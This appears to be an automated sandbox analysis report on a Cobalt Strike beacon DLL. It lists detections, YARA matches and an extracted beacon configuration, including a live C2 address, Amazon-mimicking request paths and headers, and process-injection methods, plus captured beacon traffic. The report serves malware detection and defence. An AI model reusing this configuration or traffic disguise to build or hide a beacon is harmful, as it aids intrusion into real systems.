Windows Analysis Report
8082-x86.dll

Overview

General Information

Sample Name:	8082-x86.dll
Analysis ID:	780200
MD5:	8d72fc6ff9cb0971df587d20dda5e8c8
SHA1:	d6031029133084901392b856fe66f00f438d95d9
SHA256:	0b7d19cf030839c3df481069772c7a32b5a3be4c41ce6b436ab69015fa90d98a
Tags:	45139105143CobaltStrikedllopendir
Infos:

Detection

CobaltStrike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected CobaltStrike

C2 URLs / IPs found in malware configuration

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Uses 32bit PE files

Yara signature match

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Uses code obfuscation techniques (call, push, ret)

Detected TCP or UDP traffic on non-standard ports

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Program does not show much activity (idle)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8082-x86.dll

Avira: detected

Multi AV Scanner detection for submitted file

Source: 8082-x86.dll	ReversingLabs: Detection: 87%
Source: 8082-x86.dll	Virustotal: Detection: 70%			Perma Link

Machine Learning detection for sample

Source: 8082-x86.dll

Joe Sandbox ML: detected

Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8082, "SleepTime": 38500, "MaxGetSize": 1399607, "Jitter": 27, "C2Server": "20.104.209.69,/broadcast", "HttpPostUri": "/1/events/com.amazon.csm.csa.prod", "Malleable_C2_Instructions": ["Remove 1308 bytes from the end", "Remove 1 bytes from the end", "Remove 194 bytes from the beginning", "Base64 decode"], "SpawnTo": "16nKFaB/gr/TtjAg2jiqFg==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 1670873463, "bStageCleanup": "True", "bCFGCaution": "True", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 16700, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "False", "HostHeader": ""}

Uses 32bit PE files

Source: 8082-x86.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 20.104.209.69

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49689

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: /Origin: https://www.amazon.comx-amz-rid: MTI4NDQwODUyNAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14246Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49685 -> 20.104.209.69:8082

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS

Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69

Source: loaddll32.exe, 00000000.00000002.620161836.0000000000E2E000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.620169392.0000000000E58000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-8

Source: unknown

HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: */*Origin: https://www.amazon.comx-amz-rid: MTI4NDQwODUyNAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14246Connection: Keep-AliveCache-Control: no-cache

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00951449 _memset,__snprintf,__snprintf,__snprintf,HttpOpenRequestA,InternetQueryDataAvailable,InternetReadFile,InternetCloseHandle,

0_2_00951449

Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: FireEye
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown

Uses 32bit PE files

Source: 8082-x86.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Yara signature match

Source: 8082-x86.dll, type: SAMPLE	Matched rule: CobaltStrike_Resources_Artifact32_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719
Source: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Sleeve_Beacon_Dll_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/beacon.dll Versions 4.3 and 4.4, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, rs2 = 78a6fbefa677eeee29d1af4a294ee57319221b329a2fe254442f5708858b37dc, hash = 51490c01c72c821f476727c26fbbc85bdbc41464f95b28cdc577e5701790845f
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x86_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR	Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration

Tries to load missing DLLs

Source: C:\Windows\System32\loaddll32.exe	Section loaded: wwanmm.dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00953410	0_2_00953410
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009702D8	0_2_009702D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009614EB	0_2_009614EB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00966514	0_2_00966514
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00973550	0_2_00973550
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00953541	0_2_00953541
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00973B20	0_2_00973B20
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00972CD0	0_2_00972CD0

Found potential string decryption / allocating functions

Source: C:\Windows\System32\loaddll32.exe

Code function: String function: 00966ADC appears 37 times

Source: 8082-x86.dll	ReversingLabs: Detection: 87%
Source: 8082-x86.dll	Virustotal: Detection: 70%

Source: 8082-x86.dll

